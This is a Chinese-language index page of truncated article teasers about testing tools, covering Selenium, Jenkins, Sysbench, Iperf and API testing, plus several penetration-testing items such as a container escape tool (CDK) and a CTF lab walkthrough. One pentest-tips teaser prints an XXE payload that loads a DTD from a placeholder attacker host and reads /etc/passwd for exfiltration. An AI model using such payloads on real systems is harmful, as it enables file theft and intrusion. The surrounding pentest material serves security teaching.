CDK:一款针对容器场景的多功能渗透工具
作者: CDK-Team项目地址:https://github.com/cdk-team/CDK/CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。场景介绍伴随着容器技术的快速发展,容器安全问题也逐渐成为企业所关注的话...
2024-01-10
工具|如何对MySQL进行TPCC测试?
作者:丁源 RadonDB 测试负责人负责 RadonDB 云数据库、容器化数据库的质量性能测试,迭代验证。对包括云数据库以及容器化数据库性能和高可用方案有深入研究。|背景根据 DWorks 2020 年发布的《中国自研数据库登顶 TPC-C 的意义》[1] 报告显示,大于 67.9% 的受访者表示在数据库选型时会参考 TPC-C 的测...
2024-01-10
什么是白盒测试?技术、示例、类型和工具
在白盒中测试白盒测试是一种软件检查技术,涉及测试产品的底层结构、设计和编码,以验证输入输出流并改进设计、可用性和安全性。白盒测试也称为明盒测试、开盒测试、透明盒测试、基于代码的测试和玻璃盒测试,因为测试人员可以看到代码。它是称为 Box Testing 的软件测试方法的两个组成部分...
2024-01-1010 个最佳开源测试工具
开源测试工具允许测试人员在不同阶段和参数(如回归、负载等)检查软件和应用程序。它们几乎涵盖了高级软件的所有功能,因此在软件测试人员中非常受欢迎。开源测试工具的好处免费提供,从而实现低成本部署和维护由多个在线社区支持,允许远程团队与项目协作通过全球开发者的大量贡献提供...
2024-01-10不一致测试如何工作?
一个统计不一致性检验分析两个假设;一个有效的假设和一个不同的假设。工作假设 H 是一个陈述,即 n 个对象的整个数据集来自初始分布模型 F,即 H: o i Î F,其中 i = 1, 2, n。如果没有统计上重要的证据支持其拒绝,则保留该假设。不一致测试检查对象 o i在分布 F 方面是否本质上是大(或小)。基于...
2024-01-10C#中的变异测试工具
在 C# 中进行变异测试的最佳工具之一是“VisualMutator”,它与 .NET 编程环境集成在一起。以下是 VisualMutant 的功能,它是一个变异测试工具 -衡量测试套件的质量。使用内置和自定义突变算子创建一阶突变体。在 C# 中查看修改后的代码片段。对生成的突变体运行 NUnit 和 XUnit 测试。提供有关通过和失败测...
2024-01-1012 款 JS 代码测试必备工具(翻译)
每天都会产生新的代码、用户测试工具和框架。下面的列表列出了可以完成各种测试需求的代码工具。你应该调查研究一下,看这些工具是否适用于你的技术栈和技术需求。01. JasmineJasmine 是一个行为驱动的测试开发框架,用于对 JavaScript 代码进行测试。它不依赖其它任何 JavaScript 框架,也不需要 DOM...
2024-01-10
基准测试工具Sysbench
sysbeanch是跨平台的基准测试工具,支持多线程,支持多个服务器,主要包括以下几种测试:1.cpu性能 2.磁盘IO性能 3.调度程序性能 4.内存分配及传输速度 5.POSIX线性性能 6.数据库性能 2.sysbench安装安装依赖库:yum install -y automake libtool mysql-devel开始安装:进入sysbench目录./autogen.sh./configure #ERROR:...
2024-01-10![22|从0到1:API测试怎么做?常用API测试工具简介
[操作系统入门]](/wp-content/uploads/thumbs/671148_thumbnail.jpg)
22|从0到1:API测试怎么做?常用API测试工具简介 [操作系统入门]
从 0 到 1 设计一个 API 测试用例,通过这个测试用例,你可以体会到最基本的 API 测试是如何进行的,并介绍几款常用的 API 测试工具。API 测试的基本步骤API 测试的基本步骤主要包括以下三大步骤:准备测试数据(这是可选步骤,不一定所有 API 测试都需要这一步);通过 API 测试工具,发起对被...
2024-01-10
网卡测试工具说明文档
网卡测试工具说明文档 Iperf是一个网络性能测试工具。Iperf可以测试TCP和UDP带宽质量。Iperf可以测量最大TCP带宽,具有多种参数和UDP特性。 Iperf可以报告带宽,延迟抖动和数据包丢失。利用Iperf这一特性,可以用来测试一些网络设备如路由器,防火墙,交换机等的性能。Iperf的主要功能如下:TCP...
2024-01-10
app服务端渗透测试
基本知识平时安装的应用位置,里面主要是odex可运行文件/data/app系统应用位置(需要root权限),里面主要是odex可运行文件/system/app应用的数据相关的位置,里面包含一些配置,缓存信息/data/data重打包测试测试测试流程检测app是否检测签名,如果未检测签名可重打包篡改app的代码再次发布首...
2024-01-10
渗透测试人员注意!这几个小TIPS能帮你
扫码领资料获黑客教程免费&进群转乌云安全这里记录渗透测试中常见的小Tips。关于XXE漏洞的一些总结XXE Payload:<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://attacker_ip:port/xxe.dtd"><foo>&e1;</foo>xxe.dtd:File Exfiltration over HTTP:<!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e...
2024-01-10
i春秋暑期训练营丨渗透测试工程师开课啦
每个人的夏天都有专属的解锁方式或来一次难忘的旅行或躺在家里吹着空调吃西瓜又或者是和小伙伴参加暑期训练营i春秋暑期渗透测试工程师报名通道已全部开启为了保证课程质量,采取小班教学,每班仅限30人,名额有限,报满即止!快速报名通道:https://www.ichunqiu.com/train/course/13?from=weixin开...
2024-01-10渗透测试教程:什么是渗透测试?
渗透测试渗透测试,通常称为渗透测试,是一种安全测试,用于发现入侵者可能在软件应用程序、网络或在线应用程序中滥用的缺陷、危害和危险。渗透测试的目标是发现和评估软件程序中所有潜在的安全漏洞。Pen Test 是渗透测试的另一个名称。入侵者破坏或未经授权访问网络或其中保存的任何数据的...
2024-01-10
渗透测试实验(i春秋真的很简单)
首先利用给的提示:所以用户名是 ichunqiu 密码是adab29e084ff095ce3eb可以确定一般密码都是md5的,但是这个20位 应该去掉ada b29e084ff095ce3e才是正确的md5这是dede md5加密的特性破解后:only_system 接下来就是找后台目录。先用御剑扫:但是这些目录都不可利用。member更是被关闭了。最后根据dede的漏洞...
2024-01-10最佳自动化测试工具
科比通无论我们如何选择自动化,该工具都有助于移动和物联网测试。Kobiton 的 AI 驱动的无脚本功能可自动执行功能、性能、视觉和兼容性测试。它以 DevOps 的速度确保综合质量和发布。特征无需任何脚本即可捕获并执行自动化完全开放标准的 Appium 代码基于人工智能的修复自动检测崩溃视觉验证用户...
2024-01-10详解前端自动化工具gulp自动添加版本号
之前,我介绍了学习安装并配置前端自动化工具Gulp,觉得gulp确实比grunt的配置简单很多,于是我决定再深入学习一下gulp,就去网上查了资料,发现gulp还可以自动添加版本号,这个功能就为我平时在更新css或js时老是在客户端存在缓存导致更新后的效果无法实时展现的苦恼。所以就赶紧去试了一下,果...
2024-01-10
【软件测试】十大自动化软件测试工具
我们正处在一个到处都是自动化的时代!就在不久前,Sepharim Research的首席研究官Bob Egan谈到了移动安全问题。他就2016年企业移动趋势发表了声明:“当下的桌面系统(生态)已不再是单纯的电脑桌面,而是适合当下的各种体验。” 他还补充说,我们正在进入一个新一代,在...
2024-01-10
Selenium 免费的分布式的自动化测试工具
Selenium 是一个用于 Web 应用程序测试的工具。Selenium 测试直接运行在浏览器中,就像真正的用户在操作一样。支持的浏览器包括 IE(7, 8, 9, 10, 11),Mozilla Firefox,Safari,Google Chrome,Opera 等。Selenium 是一套完整的 Web 应用程序测试系统,包含了测试的录制(Selenium IDE),编写及运行(Selenium Remote Control)和...
2024-01-10
一文看懂大型应用是如何自动化测试的?
当我们开发大型应用的时候,通过自动化测试可以大幅提高应用的健壮性。每年,odoo都会发布新版本,自动化测试对于应用的回归测试非常有帮助。幸运的是,odoo框架有不同自动化测试用例。odoo主要包括三种测试方案:Python test case: 用于测试Python的业务逻辑测试JavaScript Qunit test: 用于测试JavaScript的...
2024-01-10使用接口测试工具生成的接口,如何定义使得每次页面刷新的数据不会移动?
这是接口数据结构定义data:array [object {4}]>= 5 items <= 5 itemsid number 必需authName string 必需 枚举值:权限管理 用户管理 商品管理 订单管理 数据统计path string 必需 枚举值:users goods rights orders reports children array [object ...
2024-02-12
CEAMS集成工具:可视化、自动化解决EXCEL文件表头格式不一致问题
Hello,大家好,在这辞旧迎新的2020年初,小编又来更新啦。这次将给大家分享一款对于企业来说超级实用的数据集成工具。在实际工作中,经常需要将数据以图表的形式来展示数据的价值,并且进一步大数据分析;然而数据处理过程中,数据整理经常就花费了80%的时间,尤其经常会碰到excel文件数据表...
2024-01-10
CasperJS 开源的导航脚本处理和测试工具
CasperJS 是一个开源的导航脚本和测试工具,使用 JavaScript 基于 PhantomJS 编写,用于测试 Web 应用功能,Phantom JS是一个服务器端的 JavaScript API 的 WebKit。其支持各种Web标准: DOM 处理、CSS 选择器、JSON、Canvas 和SVG。开发背景一段时间之前,我发表过一篇关于 PhantomJS 的文章,PhantomJS 是一个无界面的,包含...
2024-01-10
集成测试工具之Jenkins pipline简单表单样式
前文我们主要聊了下jenkins的插件安装、用户及权限管理、邮件发送、配置凭证到gitlab上拉取项目和创建普通job;回顾请参考https://www.cnblogs.com/qiuhom-1874/p/13810648.html;今天我们来了解下jenkins的一个核心功能pipline以及jenkins的分布式slave节点的部署; pipline介绍 pipline 是帮助 Jenkins 实现 CI 到 CD ...
2024-01-10
集成测试工具之jenkins+jooqqube做代码扫描
上一篇我们主要聊了下代码质量管理平台sonarqube的安装部署以及它的工作方式做了简单的描述和代码扫描演示;回顾请参考https://www.cnblogs.com/qiuhom-1874/p/13822428.html;今天我们来聊一下使用持续集成工具jenkins结合代码质量管理平台sonarqube来做代码扫描的相关配置; 通过前面对jenkins的介绍使用,...
2024-01-10
怎样在模拟ios设备测试移动端网页?
本人小前端一枚,制作好的网页在自己的安卓手机没问题,但是没有iphone手机,无法看到iphone上的效果。电脑是window7。如何看到网页在iphone上的效果呢?回答:chrome 模拟,不过最好还是要真机啊! chrome 下只能模拟 90%回答:用chrome浏览器回答:搞一个iphone模拟器:iPadian回答:chrome中打开inspect,然后...
2024-01-10
